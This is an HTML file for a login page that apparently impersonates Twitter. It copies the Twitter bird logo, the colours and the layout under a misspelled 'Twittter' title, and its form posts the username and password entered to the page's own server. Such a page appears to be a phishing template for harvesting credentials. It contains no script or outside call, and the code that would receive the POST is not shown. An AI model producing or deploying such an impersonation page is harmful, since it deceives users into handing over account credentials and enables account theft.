<!DOCTYPE html>
<html>
  <head>
    <title>Login on Twittter / Twittter</title>
    <style>
      * {
        padding: 0;
        margin: 0;
        box-sizing: border-box;
      }

      body {
        background-color: #fff;
        padding-top: 20px;
        font-family: system-ui, -apple-system, system-ui, "Segoe UI", Roboto;
        text-align: center;
      }

      .logo {
        height: 39px;
        fill: rgb(27, 149, 224);
      }

      .form {
        width: 570px;
        margin: 0 auto 20px auto;
      }

      .form__heading {
        color: #000;
        font-size: 23px;
        margin: 30px 0 10px 0;
        font-weight: 700;
      }

      .form__container {
        padding: 10px 15px;
      }

      .form__field {
        position: relative;
        background-color: #f5f8fa;
        border: 0;
        border-bottom: 2px solid #647786;
        height: 53px;
      }

      .form__label {
        color: #647786;
        position: absolute;
        top: 5px;
        left: 10px;
        font-size: 15px;
        font-weight: 400;
      }

      .form__input {
        background: transparent;
        border: 0;
        width: 100%;
        height: 100%;
        position: absolute;
        top: 0;
        left: 0;
        padding-top: 20px;
        color: #000;
        font-size: 19px;
        padding-left: 10px;
        outline: 0;
      }

      .form__button {
        display: flex;
        align-items: center;
        justify-content: center;
        font-size: 15px;
        font-weight: 700;
        background-color: rgb(29, 161, 242);
        border: 0;
        border-radius: 49px;
        color: #fff;
        height: 49px;
        width: 100%;
        cursor: pointer;
      }

      .form__button:hover {
        background-color: rgb(26, 145, 218)
      }

      .form__button:active,
      .form__button:visited {
        outline: 0;
      }

      .link {
        text-decoration: none;
        color: rgb(27, 149, 224);
        font-size: 15px;
      }

      .link:hover {
        text-decoration: underline;
      }

      .link:first-of-type::after {
        content: ' ·';
        color: rgb(136, 153, 166);
      }
  </style>
  </head>
  <body>
    <svg class="logo" viewBox="0 0 24 24" class="r-jwli3a r-4qtqp9 r-yyyyoo r-j66t93 r-dnmrzs r-bnwqim r-1plcrui r-lrvibr"><g><path d="M23.643 4.937c-.835.37-1.732.62-2.675.733.962-.576 1.7-1.49 2.048-2.578-.9.534-1.897.922-2.958 1.13-.85-.904-2.06-1.47-3.4-1.47-2.572 0-4.658 2.086-4.658 4.66 0 .364.042.718.12 1.06-3.873-.195-7.304-2.05-9.602-4.868-.4.69-.63 1.49-.63 2.342 0 1.616.823 3.043 2.072 3.878-.764-.025-1.482-.234-2.11-.583v.06c0 2.257 1.605 4.14 3.737 4.568-.392.106-.803.162-1.227.162-.3 0-.593-.028-.877-.082.593 1.85 2.313 3.198 4.352 3.234-1.595 1.25-3.604 1.995-5.786 1.995-.376 0-.747-.022-1.112-.065 2.062 1.323 4.51 2.093 7.14 2.093 8.57 0 13.255-7.098 13.255-13.254 0-.2-.005-.402-.014-.602.91-.658 1.7-1.477 2.323-2.41z"></path></g></svg>
    <form class="form" method="POST">
      <h1 class="form__heading">Log in to Twittter</h1>
      <div class="form__container">
        <div class="form__field">
          <label for="username" class="form__label">
            Phone, email, or username
          </label>
          <input type="text" class="form__input" name="username">
        </div>
      </div>
      <div class="form__container">
        <div class="form__field">
          <label for="password" class="form__label">
            Password
          </label>
          <input type="password" class="form__input" name="password">
        </div>
      </div>
      <div class="form__container">
        <button type="submit" class="form__button">Log in</button>
      </div>
    </form>
    <div class="links">
      <a href="#" class="link">Forgot password?</a>
      <a href="#" class="link">Sign up for Twitter</a>
    </div>
  </body>
</html>
